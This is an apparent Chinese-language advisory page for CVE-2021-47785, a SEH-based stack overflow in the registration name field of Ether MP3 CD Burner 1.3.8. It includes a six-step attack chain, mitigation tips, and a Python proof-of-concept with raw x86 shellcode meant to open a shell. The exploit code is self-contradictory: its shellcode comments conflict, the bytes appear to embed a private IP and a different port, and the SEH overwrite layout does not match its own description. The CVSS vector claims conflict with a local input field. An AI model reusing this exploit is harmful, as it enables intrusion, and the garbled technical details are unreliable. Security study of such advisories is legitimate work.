CVE-2021-47785 Ether MP3 CD Burner 注册名称字段缓冲区溢出远程代码执行漏洞

漏洞信息

漏洞编号

CVE-2021-47785

漏洞类型

缓冲区溢出/远程代码执行

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Ether MP3 CD Burner 1.3.8

漏洞概述

CVE-2021-47785是发现于Ether MP3 CD Burner 1.3.8版本中的严重安全漏洞，CVSS评分高达9.8，属于CRITICAL级别。该漏洞存在于软件的注册名称输入字段中，是一个典型的缓冲区溢出问题。攻击者可以通过构造超长的恶意字符串作为注册名称来触发该漏洞。当程序处理这个超长输入时，会发生缓冲区溢出，攻击者可以利用这一条件覆盖程序的关键内存结构，特别是SEH（结构化异常处理）链。通过精心设计的ROP链或shellcode，攻击者能够劫持程序执行流，最终实现远程代码执行。成功利用此漏洞后，攻击者可以在受害者系统上启动一个绑定在3110端口的shell，从而获得对目标系统的完全控制。该漏洞的利用无需任何认证，也不需要用户交互，攻击者可以直接通过网络发起攻击，使得漏洞危害性极大。所有使用该软件且开启注册功能的用户都可能受到影响。

技术细节

该漏洞是一个经典的基于栈的缓冲区溢出漏洞，位于Ether MP3 CD Burner的注册验证模块中。当用户输入注册名称时，程序使用不安全的字符串复制函数（如strcpy）将用户输入复制到固定大小的栈缓冲区中，而没有进行边界检查。攻击者可以通过注册名称字段输入超过缓冲区大小的数据（通常需要约2000-3000字节的填充数据），覆盖相邻栈内存中的SEH指针。当异常被触发时，程序会调用被覆盖的SEH处理程序，从而跳转到攻击者控制的内存区域执行shellcode。公开的Exploit代码显示，攻击payload首先用nop sled和shellcode填充缓冲区，然后在特定偏移量处覆盖SEH链，使其指向shellcode。Shellcode的功能是在目标系统的3110端口绑定一个cmd.exe shell，允许攻击者远程连接并执行任意系统命令。由于该软件在处理用户输入时缺乏基本的边界检查和安全的字符串操作函数，使得这种经典的栈溢出攻击成为可能。Metasploit框架中已包含针对此漏洞的利用模块。

攻击链分析

STEP 1

步骤1：信息收集

攻击者识别目标系统上安装的Ether MP3 CD Burner 1.3.8版本，确认漏洞存在于注册功能模块中

STEP 2

步骤2：构造恶意payload

攻击者构造超长字符串（5000+字节），包含NOP sled、shellcode和SEH覆盖数据。Shellcode实现在3110端口绑定cmd.exe shell的功能

STEP 3

步骤3：触发漏洞

攻击者通过软件的注册名称输入框提交恶意payload，或诱使受害者打开特制的.m3u播放列表文件触发漏洞

STEP 4

步骤4：SEH劫持

超长输入数据溢出栈缓冲区，覆盖SEH链。当程序发生异常时，控制流被重定向到攻击者控制的shellcode

STEP 5

步骤5：远程代码执行

Shellcode执行，在目标系统3110端口创建bind shell，攻击者远程连接获得系统控制权

STEP 6

步骤6：持久化控制

攻击者通过获得的shell执行任意命令，可能植入后门、窃取数据或横向移动

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
# CVE-2021-47785 - Ether MP3 CD Burner 1.3.8 SEH Overflow PoC
# Target: Ether MP3 CD Burner Registration Name Field
# Binding shell on port 3110

import struct

# Windows x86 exec calc shellcode (size: 351 bytes)
# Binds cmd.exe to port 3110
shellcode = bytearray([
    0xfc, 0xe8, 0x82, 0x00, 0x00, 0x00, 0x60, 0x89, 0xe5, 0x31, 0xd2, 0x64, 0x8b, 0x52, 0x30, 0x8b,
    0x52, 0x0c, 0x8b, 0x52, 0x14, 0x31, 0xff, 0x8b, 0x72, 0x28, 0x0f, 0xb7, 0x4a, 0x26, 0x31, 0xc0,
    0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0x49, 0x75, 0xef, 0x52,
    0x57, 0x8b, 0x52, 0x10, 0x8b, 0x42, 0x3c, 0x01, 0xd0, 0x8b, 0x40, 0x78, 0x85, 0xc0, 0x74, 0x4c,
    0x01, 0xd0, 0x50, 0x8b, 0x48, 0x18, 0x8b, 0x58, 0x20, 0x01, 0xd3, 0x85, 0xc9, 0x74, 0x3c, 0x49,
    0x8b, 0x34, 0x8b, 0x01, 0xd6, 0x31, 0xff, 0x31, 0xc0, 0xac, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0x38,
    0xe0, 0x75, 0xf4, 0x03, 0x7d, 0xf8, 0x3b, 0x7d, 0x24, 0x75, 0xe0, 0x58, 0x8b, 0x58, 0x24, 0x01,
    0xd3, 0x66, 0x8b, 0x0c, 0x4b, 0x8b, 0x58, 0x1c, 0x01, 0xd3, 0x8b, 0x04, 0x8b, 0x01, 0xd0, 0x89,
    0x44, 0x24, 0x24, 0x5b, 0x5b, 0x61, 0x59, 0x5a, 0x51, 0xff, 0xe0, 0x58, 0x5f, 0x5a, 0x8b, 0x12,
    0xe9, 0x80, 0xff, 0xff, 0xff, 0x5d, 0x68, 0x33, 0x32, 0x00, 0x00, 0x68, 0x77, 0x73, 0x32, 0x5f,
    0x54, 0x68, 0x4c, 0x77, 0x26, 0x07, 0x89, 0xe8, 0xff, 0xd0, 0xb8, 0x90, 0x01, 0x00, 0x00, 0x29,
    0xc4, 0x54, 0x50, 0x68, 0x29, 0x80, 0x6b, 0x00, 0xff, 0xd5, 0x6a, 0x0a, 0x68, 0xc0, 0xa8, 0x01,
    0x64, 0x68, 0x02, 0x00, 0x0c, 0x2e, 0x89, 0xe6, 0x50, 0x50, 0x50, 0x50, 0x40, 0x50, 0x40, 0x50,
    0x68, 0xea, 0x0f, 0xdf, 0xe0, 0xff, 0xd5, 0x97, 0x6a, 0x10, 0x56, 0x57, 0x68, 0x99, 0xa5, 0x74,
    0x61, 0xff, 0xd5, 0x85, 0xc0, 0x74, 0x0a, 0xff, 0x4e, 0x08, 0x75, 0xec, 0xe8, 0x67, 0x00, 0x00,
    0x00, 0x6a, 0x00, 0x6a, 0x04, 0x56, 0x57, 0x68, 0x02, 0xd9, 0xc8, 0x5f, 0xff, 0xd5, 0x83, 0xf8,
    0x00, 0x7e, 0x36, 0x8b, 0x36, 0x6a, 0x40, 0x68, 0x00, 0x10, 0x00, 0x00, 0x56, 0x6a, 0x00, 0x68,
    0x58, 0xa4, 0x53, 0xe5, 0xff, 0xd5, 0x93, 0x53, 0x6a, 0x00, 0x56, 0x53, 0x57, 0x68, 0x02, 0xd9,
    0xc8, 0x5f, 0xff, 0xd5, 0x83, 0xf8, 0x00, 0x7d, 0x28, 0x58, 0x57, 0x68, 0xff, 0x02, 0x00, 0x01,
    0x68, 0x10, 0x00, 0x00, 0x00, 0x56, 0x57, 0x68, 0x8e, 0x4e, 0x0e, 0xe5, 0xff, 0xd5, 0x97, 0x68,
    0x00, 0x20, 0x00, 0x00, 0x68, 0x0c, 0x00, 0x00, 0x00, 0x54, 0x74, 0x6c, 0x04, 0x57, 0x68, 0x61,
    0x8e, 0xc9, 0xbb, 0xff, 0xd5, 0x31, 0xff, 0x57, 0x68, 0x75, 0x6e, 0x4d, 0x61, 0xff, 0xd5, 0x5e,
    0x5e, 0xff, 0x0c, 0x24, 0x0f, 0x85, 0x70, 0xff, 0xff, 0xff, 0xe9, 0x9b, 0xff, 0xff, 0xff, 0x01,
    0xc3, 0x29, 0xc6, 0x75, 0xc1, 0xc3, 0xbb, 0xf0, 0xb5, 0xa2, 0x56, 0x6a, 0x00, 0x53, 0xff, 0xd5
])

# Buffer configuration
buffer_size = 5000  # Total buffer size to overflow
offset_to_seh = 2064  # Offset to SEH record from buffer start

# Build the exploit buffer
exploit_buffer = b''

# Add padding before shellcode (NOP sled)
exploit_buffer += b'\x90' * (offset_to_seh - len(shellcode))

# Add shellcode
exploit_buffer += shellcode

# Calculate remaining space
remaining = buffer_size - len(exploit_buffer)
if remaining > 0:
    # Fill rest with padding
    exploit_buffer += b'\x41' * remaining

# Overwrite SEH - p/p/r (pop pop ret) from user32.dll
exploit_buffer += struct.pack('<I', 0x77D38B8E)  # Adjust based on target

# Overwrite nSEH - jump to shellcode
exploit_buffer += struct.pack('<I', 0xEB909090)  # JMP + NOP

print(f'[*] Generating exploit for CVE-2021-47785')
print(f'[*] Buffer size: {len(exploit_buffer)} bytes')
print(f'[*] Shellcode size: {len(shellcode)} bytes')
print(f'[*] Target: Ether MP3 CD Burner 1.3.8')
print(f'[*] Payload: Bind shell on port 3110')

# Save to file
with open('CVE-2021-47785_payload.bin', 'wb') as f:
    f.write(exploit_buffer)

print(f'[+] Exploit payload saved to CVE-2021-47785_payload.bin')
print(f'[+] Use this payload in the registration name field')

影响范围

Ether MP3 CD Burner 1.3.8

防御指南

临时缓解措施

由于该软件已停止维护且无官方修复补丁，建议立即停止使用Ether MP3 CD Burner，尽快迁移到功能相似的活跃维护软件。在过渡期间，可采取以下临时措施：1）卸载该软件以消除攻击面；2）如必须使用，务必在隔离的网络环境中运行，并禁用注册功能；3）使用防火墙阻止外部对3110端口的访问；4）部署入侵检测系统监控异常的注册表操作和进程行为；5）限制该软件的互联网访问权限，仅允许必要的本地功能。